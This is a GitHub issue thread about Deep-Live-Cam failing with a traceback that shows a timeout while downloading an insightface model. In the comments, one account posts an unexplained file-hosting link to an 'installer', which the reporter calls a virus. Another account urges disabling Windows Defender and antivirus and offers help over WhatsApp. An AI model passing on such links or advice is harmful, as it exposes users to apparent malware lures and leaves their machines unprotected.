### ISSUE TITLE
App can process anything when i click on the start ,preview or live, shows some code errors

### ISSUE THREAD

**Issue by exploretech** [hacksider/Deep-Live-Cam#541]
App can not  process anything when i clicked on the START ,PREVIEW or live,rather it  shows some code errors, below are the error.

```
PS C:\py\Deep-Live-Cam>  python run.py --execution-provider cuda
download_path: C:\Users\explo/.insightface\models\buffalo_l
Downloading C:\Users\explo/.insightface\models\buffalo_l.zip from https://github.com/deepinsight/insightface/releases/download/v0.7/buffalo_l.zip...
Exception in Tkinter callback
Traceback (most recent call last):
  File "C:\Python310\lib\site-packages\urllib3\connectionpool.py", line 466, in _make_request
    self._validate_conn(conn)
  File "C:\Python310\lib\site-packages\urllib3\connectionpool.py", line 1095, in _validate_conn
    conn.connect()
  File "C:\Python310\lib\site-packages\urllib3\connection.py", line 652, in connect
    sock_and_verified = _ssl_wrap_socket_and_match_hostname(
  File "C:\Python310\lib\site-packages\urllib3\connection.py", line 805, in _ssl_wrap_socket_and_match_hostname
    ssl_sock = ssl_wrap_socket(
  File "C:\Python310\lib\site-packages\urllib3\util\ssl_.py", line 465, in ssl_wrap_socket
    ssl_sock = _ssl_wrap_socket_impl(sock, context, tls_in_tls, server_hostname)
  File "C:\Python310\lib\site-packages\urllib3\util\ssl_.py", line 509, in _ssl_wrap_socket_impl
    return ssl_context.wrap_socket(sock, server_hostname=server_hostname)
  File "C:\Python310\lib\ssl.py", line 512, in wrap_socket
    return self.sslsocket_class._create(
  File "C:\Python310\lib\ssl.py", line 1070, in _create
    self.do_handshake()
  File "C:\Python310\lib\ssl.py", line 1341, in do_handshake
    self._sslobj.do_handshake()
TimeoutError: [WinError 10060] A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond

The above exception was the direct cause of the following exception:

Traceback (most recent call last):
  File "C:\Python310\lib\site-packages\requests\adapters.py", line 667, in send
    resp = conn.urlopen(
  File "C:\Python310\lib\site-packages\urllib3\connectionpool.py", line 843, in urlopen
    retries = retries.increment(
  File "C:\Python310\lib\site-packages\urllib3\util\retry.py", line 474, in increment
    raise reraise(type(error), error, _stacktrace)
  File "C:\Python310\lib\site-packages\urllib3\util\util.py", line 39, in reraise
    raise value
  File "C:\Python310\lib\site-packages\urllib3\connectionpool.py", line 789, in urlopen
    response = self._make_request(
  File "C:\Python310\lib\site-packages\urllib3\connectionpool.py", line 490, in _make_request
    raise new_e
  File "C:\Python310\lib\site-packages\urllib3\connectionpool.py", line 468, in _make_request
    self._raise_timeout(err=e, url=url, timeout_value=conn.timeout)
  File "C:\Python310\lib\site-packages\urllib3\connectionpool.py", line 369, in _raise_timeout
    raise ReadTimeoutError(
urllib3.exceptions.ReadTimeoutError: HTTPSConnectionPool(host='objects.githubusercontent.com', port=443): Read timed out. (read timeout=None)

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:\Python310\lib\tkinter\__init__.py", line 1921, in __call__
    return self.func(*args)
  File "C:\Python310\lib\site-packages\customtkinter\windows\widgets\ctk_button.py", line 554, in _clicked
    self._command()
  File "C:\py\Deep-Live-Cam\modules\ui.py", line 105, in <lambda>
    start_button = ctk.CTkButton(root, text='Start', cursor='hand2', command=lambda: select_output_path(start))
  File "C:\py\Deep-Live-Cam\modules\ui.py", line 226, in select_output_path
    start()
  File "C:\py\Deep-Live-Cam\modules\core.py", line 174, in start
    if not frame_processor.pre_start():
  File "C:\py\Deep-Live-Cam\modules\processors\frame\face_swapper.py", line 28, in pre_start
    elif not get_one_face(cv2.imread(modules.globals.source_path)):
  File "C:\py\Deep-Live-Cam\modules\face_analyser.py", line 20, in get_one_face
    face = get_face_analyser().get(frame)
  File "C:\py\Deep-Live-Cam\modules\face_analyser.py", line 14, in get_face_analyser
    FACE_ANALYSER = insightface.app.FaceAnalysis(name='buffalo_l', providers=modules.globals.execution_providers)
  File "C:\Python310\lib\site-packages\insightface\app\face_analysis.py", line 27, in __init__
    self.model_dir = ensure_available('models', name, root=root)
  File "C:\Python310\lib\site-packages\insightface\utils\storage.py", line 28, in ensure_available
    return download(sub_dir, name, force=False, root=root)
  File "C:\Python310\lib\site-packages\insightface\utils\storage.py", line 17, in download
    download_file(model_url,
  File "C:\Python310\lib\site-packages\insightface\utils\download.py", line 71, in download_file
    r = requests.get(url, stream=True)
  File "C:\Python310\lib\site-packages\requests\api.py", line 73, in get
    return request("get", url, params=params, **kwargs)
  File "C:\Python310\lib\site-packages\requests\api.py", line 59, in request
    return session.request(method=method, url=url, **kwargs)
  File "C:\Python310\lib\site-packages\requests\sessions.py", line 589, in request
    resp = self.send(prep, **send_kwargs)
  File "C:\Python310\lib\site-packages\requests\sessions.py", line 724, in send
    history = [resp for resp in gen]
  File "C:\Python310\lib\site-packages\requests\sessions.py", line 724, in <listcomp>
    history = [resp for resp in gen]
  File "C:\Python310\lib\site-packages\requests\sessions.py", line 265, in resolve_redirects
    resp = self.send(
  File "C:\Python310\lib\site-packages\requests\sessions.py", line 703, in send
    r = adapter.send(request, **kwargs)
  File "C:\Python310\lib\site-packages\requests\adapters.py", line 713, in send
    raise ReadTimeout(e, request=request)
requests.exceptions.ReadTimeout: HTTPSConnectionPool(host='objects.githubusercontent.com', port=443): Read timed out. (read timeout=None)


```

**Comment by Deepak78987** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by exploretech** [comment]
> try this https://gofile.io/d/yMHabA select the desired compiler in the installer

do what exactly with this virus

**Comment by Updatedme** [comment]
Did you see the last warning 
" ReadTimeout: HTTPSConnectionPool(host='objects...

There may be some kind of security holding this . 
I recommend you take down the window defender or antivirus holding the http, and then you should run the requirements .

**Comment by Updatedme** [comment]
If you need further assistance with deep-live-cam or help with full installation, reach out to me on whatsapp 
https://wa.me/message/GXQYWX4XRTXGB1 +2347081306010

**Comment by exploretech** [comment]
> https://github.com/deepinsight/insightface/releases/download/v0.7/buffalo_l.zip

i think this link is refusing connection, i tried to do this manually on a web browser, but no way, kindly tell me what to do, I've uninstalled antivirus and all. started installation afresh, created venv , still same error,

**Comment by exploretech** [comment]
> Did you see the last warning " ReadTimeout: HTTPSConnectionPool(host='objects...
> 
> There may be some kind of security holding this . I recommend you take down the window defender or antivirus holding the http, and then you should run the requirements .

i was able to download buffalo 1 from another website, pasted it in the directory it created for the buffalo, this didnt solve the issue
